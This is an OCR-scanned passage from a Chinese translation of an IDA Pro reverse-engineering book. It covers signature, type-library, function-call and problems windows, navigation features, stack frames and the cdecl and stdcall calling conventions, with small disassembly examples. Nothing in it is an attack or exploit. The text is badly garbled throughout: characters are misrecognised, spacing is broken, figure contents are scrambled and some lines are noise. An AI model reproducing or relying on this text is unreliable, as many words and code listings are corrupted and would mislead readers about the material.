至 少 在 两 种 情况 下 ， 你 需要 知道 如 何 对 二 进 制 文件 应 用 其 他 签名 。 第 一 种 情况 : IDA 无 法 识 
别 用 于 构建 二 进 制 文件 的 编译 占 ， 因 而 无 法 选择 所 需 的 相应 签名 。 这 时 ， 你 需要 根据 自己 的 初步 
分 析 ， 确 认 IDA 应 尝试 使 用 的 签名 ， 并 人 迫使 IDA 使 用 一 个 或 几 个 签名 。 第 二 种 情况 : IDA 中 没有 
针对 某 些 库 的 现成 签名 ， 这 时 你 需要 为 这 些 库 创 建 你 自己 的 签名 。 例 如 ， 为 FreeBSD 8.0 目 带 的 
OpenSSL 毅 态 库 创 建 答 名 就 是 如 此 。DataRescue 提 供 一 个 工具 包 ， 可 用 于 生成 供 IDA 的 签名 匹配 
引擎 使 用 的 自 定义 签名 。 我 们 将 在 第 12 章 中 讨论 如 何 生成 目 定 义 签名 。 无 论 你 出 于 什么 原因 想 要 
应 用 新 签名 , 在 签名 窗口 中 按 下 INSERT 键 或 右 击 窗口 , IDA 都 会 为 你 提供 Apply new signature ( 应 
用 新 签名 ) 选项 。 这 时 ， 你 可 以 从 你 所 安装 的 IDA 版 本 包含 的 所 有 签名 中 选择 你 需要 的 签名 。 























5.3.5 “类 型 库 窗 口 


类 型 库 窗 口 在 概念 上 与 签名 窗口 类 似 。 类 型 库 保 存 IDA 积 累 的 一 些 信息 ， 即 IDA 从 最 常用 的 
编译 右 的 头 文件 中 搜集 到 的 有 关 预 定义 数据 类 型 和 函数 原型 的 信息 。 通 过 人 处理 头 文件 ，IDA 可 确 
定名 用 库 函 数 所 需 的 数据 类 型 ， 并 为 反 汇 编 代 人 码 提供 相应 的 注释 。 同 样 ，IDA 还 可 从 这 些 头 文件 
中 了 解 复杂 数据 结构 的 大 小 和 布局 。 所 有 这 些 信息 都 收集 在 TIL 文 件 (<IDADIRVil 目 录 > ) 中 ， 
并 可 在 任何 时 候 应 用 于 你 分 析 的 二 进 制 文件 。 与 应 用 签名 时 一 样 ， 在 选择 加 载 一 组 适当 的 TIL 文 
件 之 前 ，IDA 必 须 首 先 确 定 一 个 程序 所 使 用 的 库 。 要 请 求 IDA 加 载 其 他 类 型 库 ， 可 以 在 类 型 库 窗 
口中 按 下 INSERT 键 ， 或 右 击 窗口 并 在 出 现 的 沫 单 中 选择 Load Type Library( 加 载 类 型 库 )。 类 型 
库 将 在 第 13 章 详细 讨论 。 


5.3.6 ”函数 调用 窗口 


在 任何 程序 中 ,一 个 函数 可 以 调用 其 他 函数 ,也 可 以 被 其 他 函数 调用 。 实 际 上 ， 建 立 一 个 图 
形 来 说 明 调 用 方 与 被 调用 方 之 间 的 关系 , 是 一 个 相当 倘 单 的 任务 。 这 样 的 图 形 叫 做 函数 调用 图 形 
或 函数 调用 树 〈 我 们 将 在 第 9 章 介绍 如 何在 IDA 中 生成 这 类 图 形 )。 有 时 候 ， 我 们 并 不 需要 查看 程 
序 的 完整 调用 图 形 ， 而 只 对 指定 也 数 的 “近邻 ” 感 兴趣 。 如 末了 下 接 调 用 X， 或 者 X 和 耻 接 调用 Y， 
则 称 Y 是 X 的 近邻 。 


























60 £53 IDA 数据 显示 窗口 


咀 数 调用 窗口 提供 了 这 类 “近邻 ”的 问题 的 答案 。 打 开 隐 数 调用 窗口 时 ，IDA 会 确定 光标 所 
在 位 置 的 咀 数 的 “近邻 "， 并 生成 如 图 5-10 所 示 的 窗口 。 








[Z| .text:004010DC ` main call sub 40182C 
3| ,text'0040110B _main call sub 40182C 
al ,text:0040112F _main call sub_40182C 
sl .text:00401148 main cal sub 40182C 
[6|.text:00401157 ^ ^ main call sub 40182C 


. SEH prolog4 

. errno 

. invalid parameter 
sub 4015EC 

. lock file2 


.text:00401846 
[3 | .text:00401856 
(a | .text:00401863 
IS | .text:00401870 


e | .text:0040187A 
.text:00401882 


(8 | .text:00401892 
I9. | .text:0040189A 
(30 | .text:004018A2 
‚text:0040 18AB 
.text:0040 18BA 
.text:004018C2 


.text:004018C8 
EG .text:004018D3 


图 5-10 


sub_4015EC 

_ stbuf 
sub_4015EC 

. output | 

sub 4015EC 

. ftbuf 

loc 4018C8 

. SEH epilog4 
sub 4015EC 

. unlock file2 


; Fin... 


; Fin... 





PK CTS] HH fr O 





ERAMATE, RIEA, mär 40182C8& main 从 6 个 不 同 的 位 置 调用 ， 而 这 个 函数 又 调 
用 了 男 外 15 个 函数 。 双 击 孔 数 调 用 和 窗口 中 的 任何 一 行 ，IDA 将 立即 跳 转 到 反 汇 编 窗 口中 对 应 的 调 
用 或 被 调用 国 数 ( 即 调 用 方 或 被 调用 方 )。IDA 交 叉 引 用 C xrefs ) 是 用 于 生成 函数 调用 窗口 的 机 
制 。 我 们 将 在 第 9 草 详 细 讨论 xrefs。 





5.3.7 ”问题 窗口 


IDA 在 问题 窗口 中 显示 它 在 反 汇 编 二 进 制 文件 时 遇 到 的 困难 ， 以 及 它 如 何 处 理 这 些 困 难 。 有 
些 时 候 ， 你 可 以 操纵 反 汇 编 代码 ， 帮 助 IDA 解 决 问题 ,但 情况 并 非 总 是 如 此 。 即 使 在 反 汇 编 最 简 
单 的 二 进 制 文件 时 , 你 也 可 能 会 遇 到 问题 。 许多 时 候 , 忽略 这 些 问 题 并 不 是 坏事 。 为 了 处 理 问题 ， 
你 需要 比 IDA 更 深入 地 理解 二 进 制 文件 ， 但 我 们 大 多 数 人 都 无 法 做 到 这 一 点 。 下 面 是 一 组 问题 : 





Address Type Instruction 
.text:0040104C BOUNDS call eax 
.text:004010BO0 BOUNDS call eax 
.text:00401108 BOUNDS call eax 
.text:00401350 BOUNDS call dword ptr [eax] 
.text:004012A0 DECISION push ebp 
.text:004012D0 DECISION push ebp 
.text:00401560 DECISION jmp ds: set app type 
.text:004015F8 DECISION dd OFFFFFFFFh 
.text:004015FC DECISION dd 0 
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可 以 看 到 ， 每 个 问题 都 注 明 了 问题 发 生 的 地 址 、 问 题 的 类 型 以 及 问题 所 在 位 置 的 指令 。 在 这 
个 例子 中 ， 我 们 看 到 一 个 BOUNDS 问 题 和 一 个 DECISION 问 题 。 如 果 无 法 确定 调用 或 跳 转 的 目标 ( 例 
如 在 上 例 中 ，IDA 无 法 获得 eax 的 值 )， 或 者 该 目标 明显 不 在 程序 的 虚拟 地 址 范围 内 ， 这 时 就 会 发 
生 BOUNDS 问 题 。 许 多 时 候 ，DECISION 问 题 根本 不 是 问题 。DECISION 问 题 通 常 表示 IDA 决 定 将 一 个 
地 址 上 的 字 节 作为 指令 而 非 数 据 进 行 反 汇编 ， 即 使 这 个 地 址 在 递归 下 降 指 令 遍 历 (参见 第 1 章 ) 
过 程 中 从 未 被 引用 也 是 如 此 。 有 关 问 题 类 型 及 其 处 理 建议 的 完整 内 容 ， 请 参阅 IDA 的 内 部 帮助 文 
档 (请 查阅 Problem List 问 题 列表 这 一 主题 )。 

















5.4 ”小结 


初 看 起 来 ，IDA 中 似乎 有 太 多 的 和 窗口。 首先 于 悉 最 主要 的 窗口 ， 然 后 逐步 了 解 其 他 窗口 ， 是 
认识 IDA 和 窗口 的 最 简单 方法 。 无 论 什 么 时 候 ， 你 都 没有 义务 利用 IDA 的 所 有 窗口 ， 也 并 不 是 每 一 
个 窗口 部 可 以 为 逆向 工程 任务 提供 帮助 。 

除了 在 本 章 中 介绍 的 窗口 外 ， 在 深入 学 习 IDA 的 过 程 中 ,你 还 会 遇 到 大 量 对 话 框 。 在 本 书 的 
剩余 部 分 ,我 们 将 在 必要 时 介绍 一 些 主要 的 对 话 框 。 最 后 ， 除 默认 的 反 汇 编 视 图 图 形 外 ， 这 一 章 
并 未 涉及 其 他 图 形 。IDA 沫 单 系统 将 图 形 作为 一 种 独立 的 显示 ， 区 别 于 本 章 讨论 的 子 窗口 ， 专 门 
介绍 图 形 的 第 9 和 草 将 说 明 这 样 做 的 原因 。 

现在 ， 你 已 经 对 IDA 的 用 户 界面 相当 网 悉 。 在 下 一 章 中 ， 我 们 将 开始 讨论 各 种 操纵 反 汇 编 代 
码 的 方法 ， 以 增强 你 对 其 行为 的 了 解 ， 同 时 帮助 你 进一步 熟悉 IDA 的 用 法 。 

















有 反 汇 编导 航 








本 章 和 下 一 章 ， 我 们 将 介绍 IDA Pro 在 交互 性 方面 的 主要 特点 ， 简 言 之 ， 也 就 是 易于 导 

十 的 和 易于 操纵 本 章 的 重点 是 导航 ， 我 们 将 说 明 如 何 利 用 IDA 以 符合 逻辑 的 方式 迅速 

麟 览 反 汇编 代码 。 到 目前 为 止 ， 我 们 已 经 7 了解 到 ，IDA 基 本 上 是 将 许多 第 用 逆向 工程 工具 的 功能 

整合 到 了 一 个 集成 的 反 汇 纺 窗 口中。 想 要 束 练 使 用 IDA， 学 会 如 何在 窗口 中 导航 是 你 需要 竺 握 的 

一 项 基本 拉 能 。 除 上 下 滚动 反 汇 编 代 码 清单 外 ,表态 反 汇 编 代 码 清单 并 未 提供 任何 回 有 的 导航 功 

能 。 即 使 是 使 用 最 优秀 的 文本 编辑 器 ， 对 这 类 死 列表 导航 也 非常 困难 ， 因 为 它们 最 多 只 提供 一 个 
集成 的 、 类 似 于 grep 的 搜索 功能 。 但 是 ， 你 会 发 现 ，IDA 的 数据 库 提 供 了 日 越 的 导航 功能 。 

















6.1 基本 IDA 导航 


当 你 开始 接触 IDA 时 , 你 可 能 满足 于 IDA 提 供 的 导航 功能 。 除 提供 相当 标准 的 查找 功能 外 (在 
使 用 文本 编辑 表 或 文字 处 理 角 时 ， 你 已 经 融 悉 这 些 功 能 )，IDA 还 将 生成 并 显示 一 个 完整 的 交叉 
引用 ( 其 功能 类 似 于 Web 页 面 上 的 超 链接 ) 列表 。 因 此 ,多 数 情况 下 ,要 导航 到 你 感 兴趣 的 位 置 ， 
只 需 双 击 鼠 标 即 可 。 











6.1.1 双击 导航 


有 反 汇 编程 序 时 ,程序 的 每 个 位 置 都 分 配 到 了 一 个 虚拟 地 址 。 因 此 ， 只 要 提供 希望 访问 的 位 置 
的 虚拟 地 址 ， 就 可 以 导航 到 程序 的 任何 地 方 。 遗 憾 的 是 ， 对 我 们 而 言 ， 记 住 大 量 地 址 并 非 多 事 。 
这 促使 早期 的 程序 员 给 他 们 希望 引用 的 程序 位 置 分 配 符号 名 称 , 这 大 大 简化 了 他 们 的 工作 。 给 程 
序 地 址 分 配 和 从 号 名 称 ， 与 给 程序 操作 人 码 分 配 助 记 指 令 名 称 并 无 不 同 。 由 于 程序 更 易于 记忆 , BR 
和 号 入 程序 也 更 加 方便 。 

如 前 所 述 ， 在 分 析 阶 段 ，IDA 会 通过 检查 二 进 制 文件 的 符号 表 生 成 符号 名 称 ， 或 根据 二 进 制 
文件 引用 位 置 的 方式 目 动 生成 一 个 名 称 。 除 从 号 用 途 外 , 反 汇 编 窗 口中 显示 的 任何 名 称 部 是 一 个 
次 在 的 导航 目标 ,类似 于 网 页 中 的 超 链接 。 这 些 名 称 与 标准 超 链接 之 间 的 区 别 在 于 : 其 一 ,这些 
名 称 不 像 超 链接 那样 突出 显示 ， 表 示 它 们 可 以 访问 ; 其 次 ，IDA 中 的 名 称 需要 双击 才能 访问 ， 而 
访问 超 链接 只 需 单 击 即 可 。 前 面 我 们 已 经 讨论 过 如 何在 各 种 子 窗口 《如 导入 、 导 出 和 困 数 窗口 ) 
中 使 用 名 称 ， 在 这 些 窗口 中 ， 双 击 一 个 名 称 ，IDA 将 跳 转 到 反 汇 编 窗口 中 被 引用 的 位 置 。 这 只 是 
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双击 导航 的 一 个 简单 例子 。 如 下 例 所 示 ， 每 一 个 标 有 目的 符号 都 是 一 个 已 命名 的 导航 目标 。 双 击 
任何 一 个 符号 ，IDA 将 跳 转 到 相应 的 位 置 。 


.text:0040132B loc 40132B: ; CODE XREF: @sub 4012E4+B^] 
. text :0040132B cmp edx, OCDh 

. text :00401331 jg short @loc 40134E 

.text :00401333 jz O oc 4013BF 

. text :00401339 sub edx, OAh 

. text :0040133C RE short @loc 4013A7 

. text :0040133E sub edx, OC1h 

. text :00401344 JZ short @loc 4013AF 

.text:00401346 dec edx 

. text :00401347 jz short @loc 4013B7 

. text :00401349 jmp @loc 4013DD  ; default 

. text :00401349 ; jumptable 00401300 case O 


.Lext:0040134E ; --------------- 
. text :0040134E 
.text:0040134E loc 40134E: ; CODE XREF: Osub 4012E444D^j 











为 方便 导航 ，IDA 把 男 外 两 个 显示 实体 看 成 是 导航 目标 。 首 完 ， 交叉 引用 ( 如 @ 所 示 ) 被 当 
成 导 轴 日 标 。 通 第， 交 广 引用 被 格式 化 成 一 个 名 称 和 一 个 十 六 进 制 偏 移 值 。 在 上 面 的 代码 中 ， 
1oc_40134E 右 边 的 交 又 引用 引用 了 sub_4012E4 之 前 的 4Dw 或 77w 字 市 的 位 置 。 双 击 交 又 引用 文本 ， 
IDA 将 跳 转 到 引用 位 置 ( 本 例 中 为 00401331 )。 第 9 章 将 详细 介绍 交叉 引用 。 

从 导航 角度 看 , 第 二 种 需要 特别 注意 的 显示 实体 是 使 用 十 六 进 制 值 的 显示 实体 。 如果 窗 口中 的 
一 个 十 六 进 制 值 是 二 进 制 文件 中 的 一 个 合法 虚拟 地 址 , 那么 , 双击 这 个 值 , 反 汇编 窗口 将 显示 你 先 
择 的 虚拟 地 址 。 在 下 面 的 代码 中 ,双击 任何 一 个 标 有 息 的 值 ， 反 汇编 窗口 将 跳 转 到 相应 的 位 置 ， 
为 它们 都 属于 给 定 二 进 制 文件 中 的 合法 虚拟 地 址 。 不 过 ， 双 击 标 有 @ 的 值 则 不 会 有 任何 效果 。 





























.data:00409013 db 04 
.data:00409014 dd 94037BOh 
.data:00409018 db 00 
.data:00409019 db @oAh 
.data:0040901A dd 6404590h 
.data:0040901E db 00 
.data:0040901F db @oAh 
.data:00409020 dd 404DA8h 





最 后 ， 双 击 导航 还 与 IDA 的 输出 窗口 有 关 ， 尽 管 该 窗口 常用 于 显示 各 种 信息 性 的 消息 。 当 一 
个 导航 目标 ( 如 前 所 述 ) 出 现在 一 条 消息 的 开头 位 置 时 ， 双 击 这 条 消息 ， 反 汇编 窗口 将 跳 转 到 相 
应 的 位 置 。 





Propagating type information... 
Function argument information has been propagated 
The initial autoanalysis has been finished. 

© 40134e is an interesting location 

O Testing: 40134e 
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@ loc 4013B7 
O Testing: loc 4013B7 





在 上 面 的 输出 窗口 中 ,两 条 标 有 @ 的 消息 可 用 于 导航 到 在 消息 开头 位 置 指定 的 地 址 。 双 击 其 
他 任何 消息 ， 包 括 那 些 标 有 @ 的 消息 ， 将 不 会 有 任何 效果 。 


6.1.2. Wain 


有 了 时候, 你 清楚 地 知道 你 想 要 导航 的 目的 地 址 ,但 反 汇 编 窗 口中 并 没有 可 供 双 击 导 航 的 名 称 。 
在 这 种 情况 下 ,你 有 几 种 选项 供 选 择 。 第 一 个 是 最 基本 的 选项 ， 即 使 用 反 汇 编 窗口 深 动 条 上 下 深 
动 窗口 ， 直 到 看 到 想 要 访问 的 地 址 。 通 和 党 ， 只 有 知道 要 导航 到 的 目标 地 址 的 虚拟 地 址 时 ， 才 能 采 
用 这 个 选项 , 因为 反 汇 编 窗口 是 按 虚拟 地 址 逐 行 显 示 的 。 如 果 你 仅仅 知道 一 个 已 命名 的 位 置 ， 如 
一 个 名 为 foobar 的 子 程序 ,那么 ， 通 过 滚动 条 找 目 的 地 址 就 无 异 于 大 海 搁 针 。 这 时 ， 你 可 以 选择 
对 上 驮 数 窒 口 按 字 母 排序 , 滚动 到 想 要 的 名 称 , 然后 再 双击 该 名 称 。 第 三 个 选项 是 使 用 IDA 的 Search 
玉 单 提供 的 搜索 功能 。 通 常 ， 在 要 求 IDA 搜 索 前 需要 指定 一 些 搜 索 标准 。 如 果 你 搜索 的 是 一 个 已 
知 的 位 置 ， 使 用 该 选项 有 点 小 题 大 做 。 

最 后 ， 到 达 一 个 已 知 的 反 汇 编 位 置 的 最 简单 方法 是 , 利用 如 图 6-1 所 示 的 Jump to Address ( E 
转 到 地 址 ) 对 话 框 。 























Jump address | "| 


Cancel | Felp | 






图 6-1 Jump to Address 对 话 框 
使 用 Jump > Jump to Address 命 令 或 在 处 于 活动 状态 的 反 汇编 窗口 中 按 下 热 键 G， 均 可 以 打开 





Jump to Address 对 话 框 。 如 果 把 这 个 对 话 框 看 成 Go 对 话 框 ,可 能 有 助 于 你 记 住 相关 的 热 键 。 要 想 
导航 到 二 进 制 文件 中 的 某 个 位 置 ， 只 需 指 定 一 个 地 址 (名称 或 十 六 进 制 值 )， 然 后 单 击 OK,，IDA 
会 立即 显示 你 指定 的 位 置 。IDA 会 记 住 你 在 这 个 对 话 框 中 输入 的 值 ， 并 通过 一 个 下 拉 列 表 显示 ， 
以 方便 你 随后 使 用 。 使 用 这 项 历史 记录 功能 ， 你 可 以 迅速 返回 你 之 前 访问 过 的 位 置 。 


6.1.3 ”导航 历史 记录 


如 条 将 IDA 的 文档 导航 功能 与 Web 训 览 带 的 相应 功能 进行 比较 ， 我 们 可 能 会 认为 名 称 和 地 址 
等 同 于 超 链 接 ， 因 为 可 以 相对 容易 地 访问 它们 以 查看 新 地 址 。IDA 的 为 一 项 类 似 于 传统 Web 浏 览 
舱 的 功能 ， 是 它 的 前 进 和 后 退 寻 航 功 能 (基于 你 浏览 反 汇 编 窗 口 的 顺序 ) 每 次 你 导航 到 反 汇 编 
窗口 中 的 一 个 新 位 置 ,你 当前 的 位 置 就 会 语 加 到 位 置 列表 中 。 有 两 种 沫 单 操 作 可 用 于 过 有 历 这 个 列 
表 。 首 先 ，Jump > Jump to Previous Position ( SG » 跳 转 到 前 一 个 位 置 ) 命令 可 使 反 汇编 窗口 立 
即 路 转 到 当前 位 置 的 前 一 个 位 置 。 这 项 操作 在 概念 上 等 同 于 Web 训 览 厅 的 后 退 按钮 。 其 次 为 热 键 
ESC, 它 是 IDA 中 最 有 用 的 热 键 之 一 〈 可 放 和 内存) 但 是 ,需要 注意 的 是 ,在 反 汇 编 窗 口 以 外 的 
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其 他 窗口 中 ， 使 用 ESC 键 会 关闭 当前 窗口 。 不 过 ， 你 可 以 通过 View » Open Subviews 命 令 重 新 打 
开 你 不 小 心 关 闭 的 窗口 。 在 反 汇 编 窗口 中 ， 如 果 你 已 经 深入 到 一 个 国 数 调用 链 的 几 个 层次 ， 这 时 
你 希望 导航 到 最 初 的 位 置 ， 使 用 后 退 导 航 就 极其 方便 。 

Jump > Jump to Next Position ( 跳 转 》 跳 转 到 下 一 位 置 ) 类 似 于 Web 浏 览 磊 中 的 前 进 按 钮 ， 它 
可 将 反 汇 编 窗口 移动 到 列表 中 的 下 一 个 位 置 。 与 这 项 操作 对 应 的 热 rr 
键 是 CTRL+ENTER， 尽 管 它 并 不 如 用 于 后 退 导 航 的 ESC 键 有 用 。 ET 

最 后 ， 工 具 栏 上 还 有 两 个 更 有 用 的 导航 按钮 ， 如 图 6-2 所 示 ， 它 
们 的 作用 与 浏览 器 中 的 前 进 和 后 退 按钮 类 似 。 每 个 按钮 卷 边 还 有 一 


























位 置 ， 而 不 必 遍 历 整 个 历史 记录 列表 。 


6.2 dX»: 


因为 IDA Pro 是 一 种 低级 分 析 工 具 ， 要 利用 它 的 许多 功能 和 显示 窗口 ， 需 要 用 户 熟 悉 低 级 编 
译 语言 ， 其 中 许多 概念 与 生成 机 器 语言 和 管理 由 高 级 程序 使 用 的 内 存 有 关 。 为 了 更 好 地 理解 IDA 
中 的 一 些 显 示 ， 有 必要 不 时 介绍 一 些 编译 程序 理论 ， 以 帮助 理解 相关 的 IDA 显 示 。 

filli ( stack frame ) 就 是 这 样 一 种 低级 概念 。 栈 帧 是 在 程序 的 运行 时 栈 中 分 配 的 内 存 块 ， 专 
门 用 于 特定 的 函数 调用 。 程 序 员 通常 会 将 可 执行 语句 分 组 ， 划 分 成 叫做 函数 ( 也 称 过 程 、 子 例 程 
或 方法 ) 的 单元 。 有 了 时候， 这 样 做 是 遵照 所 使 用 的 语言 的 要 求 。 多 数 情 况 下 ， 以 这 些 函 数 单元 为 
基础 构建 程序 是 一 种 良好 的 编程 实践 。 

如 果 一 个 函数 并 未 执行 ， 通常 它 并 不 需要 内 存 。 但 是 ， 当 滑 数 被 调用 时 ， 它 就 可 能 因为 某 种 
原因 需要 用 到 内 存 。 这 源 于 几 方 面 的 原因 。 其 一 ， 也 数 的 调用 方 可 能 希望 以 参数 ( 实 参 ) 的 方式 
向 该 函数 传递 信息 , 这 些 参数 需要 存储 到 函数 能 够 找到 它们 的 位 置 。 其 二 , 在 执行 任务 的 过 程 中 ， 
国 数 可 能 需要 临时 的 存储 空间 。 程序 员 通 常会 通过 声明 局 部 变量 来 分 配 这 类 临时 空间 , 这 些 变量 
将 在 函数 内 部 使 用 ， 完 成 函数 调用 以 后 ， 就 无 法 再 访问 它们 。 

编译 融通 过 栈 帧 C 也 叫做 激活 记录 ) 使 得 对 因数 参数 和 局 部 变量 进行 分 配 和 释放 的 过 程 对 程 
序 员 透 明 。 在 将 控制 权 转 交 给 洱 数 之 前 ， 编译 带 会 插入 代码 ， 将 函数 参数 放 入 栈 帧 内， 并 分 配 足 
够 的 内 存 ， 以 保存 函数 的 局 部 变量 。 鉴 于 栈 帧 的 结构 ， 该 函数 的 返回 地 址 也 存储 在 新 的 栈 帧 内 。 
使 用 栈 帧 使 得 递归 成 为 可 能 ,因为 每 个 递归 函数 调用 都 有 它 自 己 的 栈 帧 , 这 恰好 将 当前 调用 与 前 
一 次 调用 分 隔 开 来 。 下 面 是 调用 一 个 函数 时 的 详细 操作 步骤 。 

(1) 调用 方 将 被 调用 函数 所 需 的 任何 参数 放 人 到 该 函数 所 采用 的 调用 约定 (参见 6.2.1 节 ) 指 
定 的 位 置 。 如 果 参 数 被 放 到 运行 时 栈 上 ， 该 操作 可 能 导致 程序 的 栈 指 针 发 生 改变 。 

(2) 调用 方 将 控制 权 转 交 给 被 调用 的 图 数 ， 这 个 过 程 负 由 x86 CALL 或 MIPS JAL 等 指令 执行 。 然 
后 ， 返 回 地 址 被 保存 到 程序 栈 或 CPU 寄存 需 中 。 

(3) 如 有 必要 ,被 调用 的 函数 会 配置 一 个 栈 指针 ", 并 保存 调用 方 希望 保持 不 变 的 任何 寄存 器 值 。 













































































CD 帧 指针 是 一 个 指向 栈 帧 位 置 的 寄存 硕 。 通 和 党， 栈 帧 内 的 变量 根据 它们 与 帧 指针 所 指向 的 位 置 的 相对 距离 来 引用 。 
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(4) 被 调用 的 图 数 为 它 可 能 需要 的 任何 局 部 变量 分 配 空间 。 一 般 ， 通 过 调整 程序 栈 指针 在 运 
行 时 栈 上 保留 空间 来 完成 这 一 任务 。 

(5) 被 调用 的 函数 执行 其 操作 ， 可 能 生成 一 个 结果 。 在 执行 操作 的 过 程 中 ， 被 调用 的 函数 可 
能 会 访问 调用 涵 数 传递 给 它 的 参数 。 如 果 卫 数 返 回 一 个 结果 ,此 结果 通常 被 放置 到 一 个 特定 的 寄 
存 秦 中 ， 或 者 放置 到 函数 返回 后 调用 方 可 立即 访问 的 寄存 带 中 。 

(6) 函数 完成 其 操作 后 ， 任 何 为 局 部 变量 保留 的 栈 空间 将 被 释放 。 通 常 ， 逆 向 执行 第 (4) 步 中 
的 操作 ， 即 可 完成 这 个 任务 。 

(7) 如 果 某 个 寄存 如 的 值 还 为 调用 方 保存 (第 (3) 步 ) 着 ， 那 么 将 其 恢复 到 原始 值 。 这 包括 恢 
Ad ya] HZ By ET PERS o 

(8) 被 调用 的 函数 将 控制 权 返 还 给 调用 方 。 实 现 这 一 操作 的 主要 指令 包括 x86 RET 和 MIPS JR. 
根据 所 使 用 的 调用 约定 ， 这 一 操作 可 能 还 会 从 程序 栈 中 清除 一 个 或 多 个 参数 。 

(9) 调用 方 一 旦 重新 获得 控制 权 ， 它 可 能 需要 删除 程序 栈 中 的 参数 。 这 时 可 能 需要 对 栈 进行 
调整 ,以 将 程序 栈 指针 恢复 到 第 (1) 步 以 前 的 值 。 

第 (3) 步 和 第 (4) 步 通常 在 进入 函数 时 执行 ， 它 们 共同 称 为 该 哨 数 的 序言 。 同 样 ， 第 (6) 步 到 第 
(8) 步 一 般 在 吧 数 结束 时 执行 ， 它 们 共同 构成 该 函数 的 尾声 。 而 第 (5) 步 则 代表 取 数 的 主体 ， 它 们 
是 调用 一 个 函数 时 执行 的 全 部 操作 。 

6.2.1 调用 约定 

了 解 栈 帧 的 基本 概念 后 ， 接 下 来 详细 介绍 它们 的 结构 。 下 面 的 例子 涉及 x86 体 系 结构 和 与 常 
见 的 x86 编 译 器 ( 如 Mircosoft Visual C/C++ 或 GNU 的 gcc/g++ ) 有 关 的 行为 。 创 建 栈 帧 时 最 重要 的 
步骤 是 , 通过 调用 函数 将 函数 参数 存 信 栈 中 。 调 用 郴 数 必 须 存 储 被 调用 羡 数 所 需 的 参数 ， 和 否则 可 
能 导致 严重 的 问题 。 各 个 函数 会 选择 并 逐 照 某 一 特定 的 调用 约定 ,以 表明 它们 和 希望 以 何 种 方式 接 
收 参 数 。 

调用 约定 指定 调用 方 放 置 消 数 所 需 参 数 的 具体 位 置 。 调用 约定 可 能 要 求 将 参数 放置 在 特定 的 
寄存 磊 、 程 序 栈 、 或 者 寄存 融和 栈 中 。 同 样 重 要 的 是 ， 在 传递 参数 时 ， 程 序 栈 还 要 决定 : 被 调用 
国 数 完成 其 操作 后 ， 由 谁 负责 从 栈 中 删除 这 些 参数 。 一 些 调 用 约定 规定 ， 由 调用 方 负 责 删除 它 放 
置 在 栈 中 的 参数 ， 而 另 一 些 调用 约定 则 要 求 被 调用 六 数 负责 删除 栈 中 的 人 参数。 遵照 指定 的 调用 约 
定 对 于 维护 程序 栈 指 针 的 完整 性 尤为 重要 。 

1. C 调 用 约定 

x86 体 系 结构 的 许多 C 编 译 絮 使 用 的 默认 调用 约定 叫做 C 调 用 约定 。 如 果 上 默认 的 调用 约定 被 重 
号 ， 则 C/C++ 程序 中 征用 的 _cdec1 修 饰 符 会 迫使 编译 颖 利用 C 调 用 约定 。 自 现在 开始 ， 我 们 把 这 
种 调用 约定 叫做 cdec1 调 用 约定 。cdecl1 调 用 约定 规定 : 调用 方 按 从 右 到 左 的 顺序 将 函数 参数 放 入 
栈 中 ， 在 被 调用 的 也 数 完 成 其 操作 时 ， 调 用 方 ( 而 不 是 被 调用 方 ) 负责 从 栈 中 清除 参数 。 

从 石 到 左 在 栈 中 放 入 参数 的 一 个 结果 是 ， 如 果 函 数 被 调用 ， 最 左边 的 (第 一 个 ) 参数 将 始终 
位 于 栈 顶 。 这 样 ， 无 论 该 也 数 需 要 多 少 个 参数 ， 我 们 都 可 轻易 找到 第 一 个 参数 。 因 此 ，cdecl1 调 
用 约定 非常 适用 于 那些 参数 数量 可 变 的 函数 ( 如 printf )。 
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要 求 调用 函数 从 栈 中 删除 参数 ,意味 着 你 将 经 党 看 到 : 指令 在 由 被 调用 的 函数 返回 后 ， 会 立 
即 对 程序 栈 指针 进行 调整 .如果 函数 能 够 接受 数量 可 变 的 参数 , 则 调用 方 非 常 适 于 进行 这 种 调整 ， 
因为 它 清楚 地 知道 ， 它 加 函数 传递 了 多 少 个 参数 ,因而 能 够 轻松 做 出 正确 的 调整 。 而 被 调用 的 函 
数 事先 无 法 知道 自己 会 收 到 多 少 个 参数 ， 因 而 很 难 对 栈 做 出 必要 的 调整 。 

在 下 面 的 例子 中 ， 我 们 调用 一 个 拥有 以 下 原型 的 函数 : 





void demo cdecl(int w, int x, int y, int z); 


SATUS, AARRE H cec JHA E, "ra EBI H, SIE RB HAT Sr. jd 
时 要 求 调用 方 清除 栈 中 的 参数 。 编 译名 可 能 会 为 这 个 函数 的 调用 生成 以 下 代码 : 


; demo cdecl(1, 2, 3, 4);  //programmer calls demo cdecl 
€ push 4 ; push parameter z 


push 3 push parameter y 
push 2 push parameter x 
push 1 push parameter w 


call the function 
adjust esp to its former value 


call demo cdecl 
O add esp, 16 


we we we we we 


从 @ 开 始 的 4 个 push 操 作 使 程序 栈 指针 (CESP) 发 生 16 个 字 节 (在 32 位 体系 结构 上 为 
4*sizeof(int) ) 的 变化 ， 从 demo_cdec1 返 回 后 ,它们 在 @ 处 被 撤销 。 如 果 demo_cdec1l 被 调用 50 次 ， 
那么 ,每 次 调用 之 后 ， 都 会 发 生 类 似 于 @ 人 处 的 调整 。 下 面 的 例子 同样 遵照 cdec1 调 用 约定 ,但 是 ， 
在 每 次 调用 demo_cdec1 后 ， 调 用 方 不 需要 删除 栈 中 的 参数 。 











; demo cdecl(1, 2, 3, 4);  //programmer calls demo cdecl 
mov [esp+12|], 4  ; move parameter z to fourth position on stack 
mov — [esp48], 3 ; move parameter y to third position on stack 
mov [esp+4], 2 ; move parameter x to second position on stack 
mov [esp], 1 ; move parameter w to top of stack 

call demo cdecl ; call the function 


在 这 个 例子 中 , ÆR "pu BRE. ANE CR TH demo cdecl1BHyZ Xi Bic S 
存储 空间 。 在 demo_cdec1 的 参数 放 到 栈 上 时 , 并 不 需要 修改 程序 栈 指针 , 因此 , 在 调用 demo_cdec 
结束 后 ， 也 就 不 需要 调整 栈 指针 。GNU 编 译 器 〈gcc 和 g++ ) 正 是 利用 这 种 技巧 将 函数 参数 放 到 
栈 上 的 。 注 意 ， 无 论 采 用 哪 一 种 方法 ， 在 调用 函数 时 ， 栈 指针 都 会 指向 最 左边 的 参数 。 

2. 标准 调用 约定 

这 里 的 标准 似乎 有 些 用 词 不 当 , 因为 它 是 微软 为 自己 的 调用 约定 所 起 的 名 称 。 这 种 约定 在 函 
数 声明 中 使 用 了 修饰 符 stdcal1， 如 下 所 示 : 








void stdcall demo stdcall(int w, int x, int y); 





